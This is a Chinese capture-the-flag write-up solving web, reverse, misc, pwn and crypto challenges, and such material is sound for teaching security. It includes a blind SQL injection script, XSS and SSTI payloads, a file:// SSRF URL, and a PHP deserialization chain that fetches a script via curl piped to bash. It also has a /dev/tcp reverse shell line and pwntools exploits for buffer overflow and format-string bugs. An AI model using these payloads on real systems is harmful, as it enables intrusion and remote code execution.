一年一度。

WEB

0x00 Welcome2021

WELCOME /f1111aaaggg9.php HTTP/1.1
Host: 1.14.102.22:8011
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

0x01 babysql

想用的一个没过滤,好耶~

admin'^1^1#提示:your uname:admin and your pwd:123456

admin'^0^1#提示:wrong username or password

使用admin'^(length(database())=7)^1#判断得知数据库的长度等于7。

爆库名,得到库名为babysql:

import requests
url = r"http://47.100.242.70:4339/index.php"

#admin^(ord(substr(database(),1,1))=199)^1
payload1 = "admin'^(ord(substr(database(),"
payload2 = ",1))="
payload3 = ")^1#"
name = ""

for i in range(1,8):
    for j in range(23,123):
        payload = payload1+str(i)+payload2+str(j)+payload3
        data = {'uname':payload,'pwd':'shaw'}
        # print(payload)
        s = requests.post(url,data=data).text
        if ("admin" in s):
            name += chr(j)
            print(name)
            break

使用admin'^((select(length(group_concat(TABLE_NAME)))from(information_schema.tables)where(table_schema="babysql"))=14)^1# 判断得知,表名的长度等于14,爆表得到jeff,jeffjokes:

payload1 = "admin'^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='babysql')),"
payload2 = ",1))="
payload3 = ")^1#"

继续爆列名,首先判断列名jeff的长度,等于23:admin'^((select(length(group_concat(COLUMN_NAME)))from(information_schema.columns)where(table_name="jeff"))=23)^1#

判断列名jeffjokes的长度,等于31: admin'^((select(length(group_concat(COLUMN_NAME)))from(information_schema.columns)where(table_name="jeffjokes"))=31)^1#

不知道哪个 都试试看也没有合适的,感觉自己跑错库了,然后真的跑错库了,哈哈^^:

payload1 = "admin'^(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),"
payload2 = ",1))="
payload3 = ")^1#"

修改语句运行得到flag库,找到表名为fllag,列名为fllllllag,长度为22:admin'^((select(length(group_concat(fllllllag)))from(flag.fllag))=22)^1#

最终爆值即可:

import requests
import time
url = r"http://47.100.242.70:4339/index.php"

#admin'^(ord(substr((select(fllllllag)from(fllag)),1,,1))=103)^1#
payload1 = "admin'^(ord(substr((select(fllllllag)from(flag.fllag)),"
payload2 = ",1))="
payload3 = ")^1#"
name = ""

for i in range(1,26):
    for j in range(23,130):
        payload = payload1+str(i)+payload2+str(j)+payload3
        data = {'uname':payload,'pwd':'shaw'}
        # print(payload)

        s = requests.post(url,data=data).text
        if ("admin" in s):
            name += chr(j)
            print(name)
            time.sleep(1)
            break

0x02 babyxss

有手有脑,构造就行:

'<script>console.log("'+"<script>alalertert(1)</script>+'");</script>';

0x03 Baby_PHP_Black_Magic_Enlightenment

第一关写入科学计数法即可绕过。

第二关:利用google找到的sha1函数碰撞绕过即可:

a=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01sF%DC%91f%B6%7E%11%8F%02%9A%B6%21%B2V%0F%F9%CAg%CC%A8%C7%F8%5B%A8Ly%03%0C%2B%3D%E2%18%F8m%B3%A9%09%01%D5%DFE%C1O%26%FE%DF%B3%DC8%E9j%C2/%E7%BDr%8F%0EE%BC%E0F%D2%3CW%0F%EB%14%13%98%BBU.%F5%A0%A8%2B%E31%FE%A4%807%B8%B5%D7%1F%0E3.%DF%93%AC5%00%EBM%DC%0D%EC%C1%A8dy%0Cx%2Cv%21V%60%DD0%97%91%D0k%D0%AF%3F%98%CD%A4%BCF%29%B1&
b=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01%7FF%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2V%0BE%CAg%D6%88%C7%F8K%8CLy%1F%E0%2B%3D%F6%14%F8m%B1i%09%01%C5kE%C1S%0A%FE%DF%B7%608%E9rr/%E7%ADr%8F%0EI%04%E0F%C20W%0F%E9%D4%13%98%AB%E1.%F5%BC%94%2B%E35B%A4%80-%98%B5%D7%0F%2A3.%C3%7F%AC5%14%E7M%DC%0F%2C%C1%A8t%CD%0Cx0Z%21Vda0%97%89%60k%D0%BF%3F%98%CD%A8%04F%29%A1

第三关:二次url编码。

0x04 babyPy

SSTI:

{{config.__class__.__init__.__globals__['os'].popen('cat flag').read()}}

0x05 babyphp

访问noobcurl.php,已经提示了flag在根目录,也没有啥限制:

http://47.100.242.70:4659/noobcurl.php?url=file://127.0.0.1/../../../../../../../flag

0x06 蜜雪冰城甜蜜蜜

f12,把id改成9就行。

0x07 babyPOP

题目如下:

<?php
class a {
    public static $Do_u_like_JiaRan = false;
    public static $Do_u_like_AFKL = false;
}

class b {
    private $i_want_2_listen_2_MaoZhongDu;
    public function __toString()
    {
        if (a::$Do_u_like_AFKL) {
            return exec($this->i_want_2_listen_2_MaoZhongDu);
        } else {
            throw new Error("Noooooooooooooooooooooooooooo!!!!!!!!!!!!!!!!");
        }
    }
}

class c {
    public function __wakeup()
    {
        a::$Do_u_like_JiaRan = true;
    }
}

class d {
    public function __invoke()
    {
        a::$Do_u_like_AFKL = true;
        return "关注嘉然," . $this->value;
    }
}

class e {
    public function __destruct()
    {
        if (a::$Do_u_like_JiaRan) {
            ($this->afkl)();
        } else {
            throw new Error("Noooooooooooooooooooooooooooo!!!!!!!!!!!!!!!!");
        }
    }
}

if (isset($_GET['data'])) {
    unserialize(base64_decode($_GET['data']));
} else {
    highlight_file(__FILE__);
}

分析得知,类c在反序列化之后立即会a::$Do_u_like_JiaRan = true;

类b中可以执行系统命令,但是有魔术方法__toString(),想要调用就要把其当成字符串使用时触发。

只有类d可以将类b输出,但是调用类d还需要将其调用为函数。

类e可以将类d调用成函数。

但是还需要将类c和其他类进行串联。把类e放入类c中即可。

<?php
class b {
    private $i_want_2_listen_2_MaoZhongDu;
    public function __construct(){
        $this->i_want_2_listen_2_MaoZhongDu='curl http://ip:port/testdel|bash';
    }
    
}

class c {
    public $shawroot;
    public function __construct(){
        $this->shawroot=new e();
    }
    
}

class d {
    public $value;
    public function __construct(){
        $this->value=new b();
    }
   
}

class e {
    public $afkl;
    public function __construct(){
        $this->afkl=new d();
    }
    
}

$data=new c();
echo base64_encode(serialize($data));
?>

公网VPS中,testdel的内容如下,当然让题目curl前还需要开启监听:

bash -i >& /dev/tcp/ip/port 0>&1

REVERSE

0x00 easypyc

pyinstxtractor.py逆出pyc,再使用uncompyle6工具得到py文件,内容如下:

# uncompyle6 version 3.8.0
# Python bytecode 3.8.0 (3413)
# Decompiled from: Python 3.8.10 (default, Sep 28 2021, 16:10:42) 
# [GCC 9.3.0]
# Embedded file name: easypyc.py
whatbox = [
 0] * 256

def aaaaaaa(a, b):
    k = [
     0] * 256
    t = 0
    for m in range(256):
        whatbox[m] = m
        k[m] = ord(a[(m % b)])
    else:
        for i in range(256):
            t = (t + whatbox[i] + k[i]) % 256
            temp = whatbox[i]
            whatbox[i] = whatbox[t]
            whatbox[t] = temp


def bbbbbbbbbb(a, b):
    q = 0
    w = 0
    e = 0
    for k in range(b):
        q = (q + 1) % 256
        w = (w + whatbox[q]) % 256
        temp = whatbox[q]
        whatbox[q] = whatbox[w]
        whatbox[w] = temp
        e = (whatbox[q] + whatbox[w]) % 256
        a[k] = a[k] ^ whatbox[e] ^ 102


def ccccccccc(a, b):
    for i in range(b):
        a[i] ^= a[((i + 1) % b)]
    else:
        for j in range(1, b):
            a[j] ^= a[(j - 1)]


if __name__ == '__main__':
    kkkkkkk = 'Geek2021'
    tttttt = [117, 62, 240, 152, 195, 117, 103, 74, 240, 151, 173, 162, 17, 75, 141, 165, 136, 117, 113, 33, 98, 151, 174, 4, 48, 25, 254, 101, 185, 127, 131, 87]
    ssss = input('Please input your flag:')
    inp = [0] * len(ssss)
    if len(ssss) != 32:
        print('Length Error!!!!')
        exit(0)
    for i in range(len(ssss)):
        inp[i] = ord(ssss[i])
    else:
        aaaaaaa(kkkkkkk, len(kkkkkkk))
        bbbbbbbbbb(inp, 32)
        ccccccccc(inp, 32)
        for m in range(32):
            if tttttt[m] != inp[m]:
                raise Exception('sorry your flag is wrong')
            print('success!!!!!!')
            print('your flag is {}'.format(ssss))

然后就麻了,参考这个

MISC

0x00 这是什么命令

根据题目描述:

cat flag.png | base64 | base64 | tac | nl | sort -k 2 > flag.txt ;rm -f flag.png & nohup php -S 0.0.0.0:2333 >> /dev/null 2>&1 &

访问flag.txt,得到内容如下:

因为贴心的标号序号了,再按数字顺序排列一下就好了。

sort -n -t '       ' -k 1 t.txt > t2.txt

再进行一次tac,解两次Base64得到一张图片即为flag。

0x01 easysend

安装MetaMask,跟着教学走就行。

0x02 easycreat

(1)首先前往Remix:https://remix.ethereum.org

(2)Remix打开后,点击左侧的示例合约“ballot.sol”。

(3)前往Github上示例合约的页面:戳我

(4)拷贝示例合约的全部代码,替换掉Remix中的合约内容。

(5)点击SOLIDITY COMPILER菜单下的Compile 3_Ballot.sol编译。

(6)点击DEPLOY & RUN TRANSACTIONS菜单下的Deploy进行部署,部署前记得把开发环境改为Injected Web3。

(7)MetaMask会弹出框框。点击确认。

(8)等待生成链接即可。

0x03 每日一溜

过滤http,提取出一张由乃的捧脸图,尾部有zip。打开得到:

vwxrstuopq34567ABCDEFGIHJyz021PQRSTKNMLOZabcdUVWXYefghijklmn89+/
FhMrPh94JHqS2jGQGM6QCsaDzI6ZyHqQQB==

用这个在线自定义base64解码得到flag。

PWN

0x00 恋爱小游戏

连我都要惊呼太简单了的程度,随便输个123就可以了。

0X01 恋爱小游戏2.0

用ida7.5可以自动过混淆,main函数如下:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char buf[24]; // [rsp+0h] [rbp-20h] BYREF
  char s2[8]; // [rsp+18h] [rbp-8h] BYREF

  strcpy(s2, "hateyou");
  init(argc, argv, envp);
  puts(&s);
  read(0, buf, 0x20uLL);
  if ( !strcmp(love, s2) )
  {
    puts(&byte_402074);
    system("/bin/sh");
    exit(0);
  }
  puts(&byte_402098);
  return 0;
}

让它等于loveyou:

from pwn import *
from struct import pack

elf = ELF('./pwn111')

local = 0
if local == 1:
    io = process('./pwn111')
    #gdb.attach(io,'b * 0x400A2A')
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
else:
    io = remote('47.242.20.238',10000)
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

payload = 'a'*(0x20-0x8)+'loveyou\x00'+p64(0xdeadbeef)
io.recvuntil("\n")
io.recvuntil("\n")
io.sendline(payload)


io.interactive()

0x02 check in

循环计算200次就可以了,也没有什么难度:

from pwn import *
from struct import pack

elf = ELF('./math')

local = 0
if local == 1:
    io = process('./math')
    #gdb.attach(io,'b * 0x400A2A')
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
else:
    io = remote('123.57.230.48',12343)
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
for i in range(1,201):
	io.recvuntil("num1:")
	num1 = io.recvuntil("\n")[:-1]
	io.recvuntil("num2:")
	num2 = io.recvuntil("\n")[:-1]
	io.recvuntil("The sign of this calculation is ")
	function = io.recvuntil("\n")[:-1]
	calc = str(eval(num1+function+num2))
	io.recvuntil("Give me your answer!!:\n")
	io.sendline(calc)

io.interactive()

0x03 easyfmt

main函数没有有用的。vuln函数如下:

int vuln()
{
  char v1[32]; // [esp+Ch] [ebp-4Ch] BYREF
  char format[32]; // [esp+2Ch] [ebp-2Ch] BYREF
  int v3; // [esp+4Ch] [ebp-Ch] BYREF

  v3 = 666;
  puts("First step:");
  printf("%p\n", &v3);
  __isoc99_scanf("%13s", format);
  printf(format);
  if ( v3 != 12 )
    exit(0);
  puts("Second Step");
  puts("nice you enter there");
  __isoc99_scanf("%20s", v1);
  return printf(v1);
}

除了vuln函数外,还存在一个后门函数,所以思路为:首先让v3=0xC满足题目条件,再让return值返回到后门函数上。

第一步要知道第几个参数可控。经测试为第15个字符可控,如图所示:

p32(v3)本身大小为4,再加8即12(0xC)。%8c意思为8个空白字符。

from pwn import *
from LibcSearcher import *

elf = ELF('./format_string')

local = 1
if local == 1:
    io = process('./format_string')
    #gdb.attach(io,'b * 0x08048634')
    #libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
else:
    io = remote('node4.buuoj.cn',26933)
    libc = ELF('./libc/libc-2.23-0ubuntu11.so')

io.recvuntil("First step:\n")
v3 = int(io.recvuntil("\n",drop=True),16)
log.success('v3: '+hex(v3))
payload = p32(v3)+"%8c%15$n"
io.sendline(payload)


io.interactive()

接下来要让返回地址跳到后门函数。经测试第7个参数可控。

在vuln函数中最后一个printf处下断点,看栈可得知v3距离return到的main函数为0x10(0xac-0x9c):

想让其跳到0x08048793(backdoor),当前为0x804873e,因此更改最后两个字节为93即可。0x93十进制即147,因为p32(v3+10)占了4个字节,所以再加143。更改字节用hhn(n 改int型、ln 改long int型、hn 改word)。最终payload如下:

from pwn import *
from LibcSearcher import *

elf = ELF('./format_string')

local = 0
if local == 1:
    io = process('./format_string')
    #gdb.attach(io,'b * 0x08048685')
else:
    io = remote('123.57.230.48',12342)
    libc = ELF('./libc/libc-2.23-0ubuntu11.so')

io.recvuntil("First step:\n")
v3 = int(io.recvuntil("\n",drop=True),16)
log.success('v3: '+hex(v3))
payload1 = p32(v3)+"%8c%15$n"
io.sendline(payload1)
io.recvuntil("there\n")
payload2 = p32(v3+0x10)+"%143c%7$hhn"
io.sendline(payload2)


io.interactive()

CRYPTO

0x00 Classical music

维吉尼亚一把梭,密钥是flag。

0x01 三个也可以

from Crypto.Util.number import getPrime,bytes_to_long
from flag import flag
flag = bytes_to_long(flag)
p = getPrime(100)
q = getPrime(100)
r = getPrime(100)
 
n = p*q*r
e = 65537
c = pow(flag, e, n)
 
print(n)
print(c)
 
'''
798898099277934230940128318327632478801901355882614385038310680236381399664973004454688807
249128262668727227416761229197781088291962817031744463346178556057415901512114944554308575
'''

使用yafu分解n得到三个素数(没截图^^),(p-1)*(q-1)*(r-1)得:

798898099277934230940128318325039401381125643772732611913116069546136964985981468840135712

求d:

gmpy2.invert(65537,798898099277934230940128318325039401381125643772732611913116069546136964985981468840135712)
#得mpz(40300244384284458664389035512497982223263215867565711201073618351763565714690247279940929)

求明文:

#flag = pow(c, d, n)
pow(249128262668727227416761229197781088291962817031744463346178556057415901512114944554308575, 40300244384284458664389035512497982223263215867565711201073618351763565714690247279940929, 798898099277934230940128318327632478801901355882614385038310680236381399664973004454688807)

得到:

0x5359437b6e6f775f796f755f736f6c76655f69747d

转字符:SYC{now_you_solve_it}